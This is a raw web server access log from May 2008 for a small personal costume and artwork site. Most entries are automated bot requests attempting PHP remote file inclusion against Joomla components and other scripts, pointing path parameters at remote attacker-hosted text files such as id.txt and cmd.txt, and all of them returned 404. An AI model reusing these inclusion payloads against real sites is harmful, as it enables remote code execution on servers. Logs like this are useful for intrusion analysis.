99.175.236.97 - - [23/May/2008:05:49:48 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:05:49:58 -0500] "GET /logs/access_log.1207785600/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
99.175.236.97 - - [23/May/2008:05:50:06 -0500] "GET /logs/access_log.1207785600/modules/Neos_Chronos/header.php?base_folder=http://ma2day.t35.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
87.106.178.42 - - [23/May/2008:05:51:29 -0500] "GET /logs/!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
87.106.178.42 - - [23/May/2008:05:51:30 -0500] "GET /logs/!scanhttp://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
87.106.178.42 - - [23/May/2008:05:51:30 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
87.106.178.42 - - [23/May/2008:05:51:30 -0500] "GET /!scanhttp://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
161.58.178.229 - - [23/May/2008:05:52:06 -0500] "GET /logs//embed/day.php?path=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:05:52:06 -0500] "GET //embed/day.php?path=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:05:52:08 -0500] "GET /logs//embed/day.php?path=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:05:52:08 -0500] "GET //embed/day.php?path=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:05:52:10 -0500] "GET /logs//embed/day.php?path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:05:52:10 -0500] "GET //embed/day.php?path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
209.164.178.178 - - [23/May/2008:05:53:29 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://imanicm.com/webcalendar/includes/on.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
209.164.178.178 - - [23/May/2008:05:53:30 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://imanicm.com/webcalendar/includes/on.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
211.10.17.19 - - [23/May/2008:06:01:01 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.808"
209.164.178.178 - - [23/May/2008:06:06:46 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://imanicm.com/webcalendar/includes/on.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
209.164.178.178 - - [23/May/2008:06:06:47 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://imanicm.com/webcalendar/includes/on.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
65.55.208.124 - - [23/May/2008:06:08:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.124 - - [23/May/2008:06:08:25 -0500] "GET /artwork/paintings.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
38.99.44.104 - - [23/May/2008:06:08:31 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)"
208.116.44.60 - - [23/May/2008:06:09:35 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
208.116.44.60 - - [23/May/2008:06:09:35 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.811"
189.22.150.131 - - [23/May/2008:06:10:45 -0500] "GET /logs/!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
189.22.150.131 - - [23/May/2008:06:10:46 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
85.236.48.244 - - [23/May/2008:06:11:31 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ezforum.de/antares/arab.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
85.236.48.244 - - [23/May/2008:06:11:31 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ezforum.de/antares/arab.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
64.13.248.31 - - [23/May/2008:06:14:24 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
64.13.248.31 - - [23/May/2008:06:14:25 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.ezforum.de/antares/id2.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
211.10.17.19 - - [23/May/2008:06:27:53 -0500] "GET /logs/access_log.1207785600//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.808"
211.10.17.19 - - [23/May/2008:06:27:53 -0500] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.808"
211.10.17.19 - - [23/May/2008:06:27:54 -0500] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.808"
211.10.17.19 - - [23/May/2008:06:27:59 -0500] "GET /logs/access_log.1207180800//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.808"
67.205.85.232 - - [23/May/2008:06:32:45 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:06:32:48 -0500] "GET /newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
122.201.76.50 - - [23/May/2008:06:33:19 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.needvisa.net/arab.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
122.201.76.50 - - [23/May/2008:06:33:19 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.needvisa.net/arab.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
67.205.85.232 - - [23/May/2008:06:33:39 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:06:33:45 -0500] "GET /newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:06:33:57 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:06:33:57 -0500] "GET /newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:06:34:07 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:06:34:08 -0500] "GET /newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
200.249.155.6 - - [23/May/2008:06:35:33 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 350 "-""libwww-perl/5.79"
65.55.208.124 - - [23/May/2008:06:36:52 -0500] "GET /costume/thmb1.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
161.58.178.229 - - [23/May/2008:06:37:43 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:06:37:44 -0500] "GET /newspublish/include.php?path[docroot]=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:06:38:04 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:06:38:04 -0500] "GET /newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:06:38:16 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:06:38:17 -0500] "GET /newspublish/include.php?path[docroot]=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
211.115.110.89 - - [23/May/2008:06:55:11 -0500] "GET /logs/access_log.1207785600//skin/zero_vote/error.php?dir=http://www.pajonk.ovh.org/cmd.txt????? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
211.115.110.89 - - [23/May/2008:06:55:11 -0500] "GET //skin/zero_vote/error.php?dir=http://www.pajonk.ovh.org/cmd.txt????? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
211.115.110.89 - - [23/May/2008:06:55:12 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.pajonk.ovh.org/cmd.txt????? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
217.67.26.84 - - [23/May/2008:06:55:44 -0500] "GET /logs/!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:06:55:44 -0500] "GET /logs/!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:06:55:44 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
217.67.26.84 - - [23/May/2008:06:55:44 -0500] "GET /!scanftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
123.237.42.77 - - [23/May/2008:07:01:53 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costumes""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.237.42.77 - - [23/May/2008:07:01:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.237.42.77 - - [23/May/2008:07:01:55 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.237.42.77 - - [23/May/2008:07:01:56 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.237.42.77 - - [23/May/2008:07:01:56 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.237.42.77 - - [23/May/2008:07:02:05 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.237.42.77 - - [23/May/2008:07:02:09 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.237.42.77 - - [23/May/2008:07:02:19 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.237.42.77 - - [23/May/2008:07:02:46 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.237.42.77 - - [23/May/2008:07:02:47 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.237.42.77 - - [23/May/2008:07:02:53 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.237.42.77 - - [23/May/2008:07:02:55 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
123.237.42.77 - - [23/May/2008:07:02:56 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
211.115.110.89 - - [23/May/2008:07:06:49 -0500] "GET /logs/access_log.1204761600//skin/zero_vote/error.php?dir=http://www.pajonk.ovh.org/cmd.txt????? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
208.111.154.15 - - [23/May/2008:07:11:14 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.15 - - [23/May/2008:07:11:14 -0500] "GET /costume/thmb7.htm HTTP/1.0" 200 2819 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
67.195.98.220 - - [23/May/2008:07:15:08 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.205.85.232 - - [23/May/2008:07:22:24 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:22:25 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:22:36 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:22:37 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
82.146.59.231 - - [23/May/2008:07:23:03 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
82.146.59.231 - - [23/May/2008:07:23:03 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
209.163.169.99 - - [23/May/2008:07:23:04 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
209.163.169.99 - - [23/May/2008:07:23:05 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
212.146.133.138 - - [23/May/2008:07:25:24 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
212.146.133.138 - - [23/May/2008:07:25:25 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
161.58.178.229 - - [23/May/2008:07:28:21 -0500] "GET /logs//popup_window.php?site_isp_root=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:28:22 -0500] "GET //popup_window.php?site_isp_root=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
209.163.169.99 - - [23/May/2008:07:29:59 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
209.163.169.99 - - [23/May/2008:07:29:59 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
67.205.85.232 - - [23/May/2008:07:30:27 -0500] "GET /logs/access_log.1207785600/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:30:28 -0500] "GET /newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:30:34 -0500] "GET /logs/access_log.1207785600/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:30:34 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:30:34 -0500] "GET /newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:30:35 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:31:05 -0500] "GET /logs/access_log.1207785600/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:31:11 -0500] "GET /newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:31:11 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
161.58.178.229 - - [23/May/2008:07:31:15 -0500] "GET /logs//popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:31:17 -0500] "GET //popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
67.205.85.232 - - [23/May/2008:07:32:15 -0500] "GET /logs/access_log.1207785600/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:32:15 -0500] "GET /newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:32:16 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
161.58.178.229 - - [23/May/2008:07:32:28 -0500] "GET /logs//popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:32:29 -0500] "GET //popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:32:46 -0500] "GET /logs//popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:32:47 -0500] "GET //popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
82.146.59.231 - - [23/May/2008:07:33:15 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
82.146.59.231 - - [23/May/2008:07:33:16 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
161.58.178.229 - - [23/May/2008:07:33:18 -0500] "GET /logs//popup_window.php?site_isp_root=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:33:20 -0500] "GET //popup_window.php?site_isp_root=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:33:24 -0500] "GET /logs//popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:33:25 -0500] "GET //popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:35:15 -0500] "GET /logs/access_log.1207785600/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:35:16 -0500] "GET /newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:35:17 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
212.146.133.138 - - [23/May/2008:07:35:21 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
212.146.133.138 - - [23/May/2008:07:35:21 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
67.205.85.232 - - [23/May/2008:07:37:03 -0500] "GET /logs/access_log.1207008000/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:37:05 -0500] "GET /logs/access_log.1207008000/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:37:11 -0500] "GET /logs/access_log.1207008000/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
67.205.85.232 - - [23/May/2008:07:37:59 -0500] "GET /logs/access_log.1207008000/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
161.58.178.229 - - [23/May/2008:07:41:51 -0500] "GET /logs/access_log.1207785600/newspublish/include.php?path[docroot]=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:41:52 -0500] "GET /newspublish/include.php?path[docroot]=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:41:53 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:42:36 -0500] "GET /logs/access_log.1207785600/newspublish/include.php?path[docroot]=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:42:37 -0500] "GET /newspublish/include.php?path[docroot]=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:42:38 -0500] "GET /logs/newspublish/include.php?path[docroot]=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
85.214.32.233 - - [23/May/2008:07:45:08 -0500] "GET /logs/index1.php?p=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
85.214.32.233 - - [23/May/2008:07:45:08 -0500] "GET /index1.php?p=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
161.58.178.229 - - [23/May/2008:07:45:45 -0500] "GET /logs/access_log.1207008000/newspublish/include.php?path[docroot]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:52:34 -0500] "GET /logs/access_log.1207008000/newspublish/include.php?path[docroot]=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:52:45 -0500] "GET /logs/access_log.1207008000/newspublish/include.php?path[docroot]=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
193.178.228.12 - - [23/May/2008:07:53:04 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.raaness.no//modules/Forums/admin/language/r0x.id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
193.178.228.12 - - [23/May/2008:07:53:05 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.raaness.no//modules/Forums/admin/language/r0x.id.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:53:25 -0500] "GET /logs/access_log.1207180800//popup_window.php?site_isp_root=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:53:26 -0500] "GET //popup_window.php?site_isp_root=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:53:26 -0500] "GET /logs//popup_window.php?site_isp_root=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:53:27 -0500] "GET /logs/access_log.1207180800//popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:53:27 -0500] "GET //popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
161.58.178.229 - - [23/May/2008:07:53:27 -0500] "GET /logs//popup_window.php?site_isp_root=http://kroll-gmbh.biz/cache/do.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
82.100.220.35 - - [23/May/2008:07:54:02 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.raaness.no//modules/Forums/admin/language/r0x.id.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
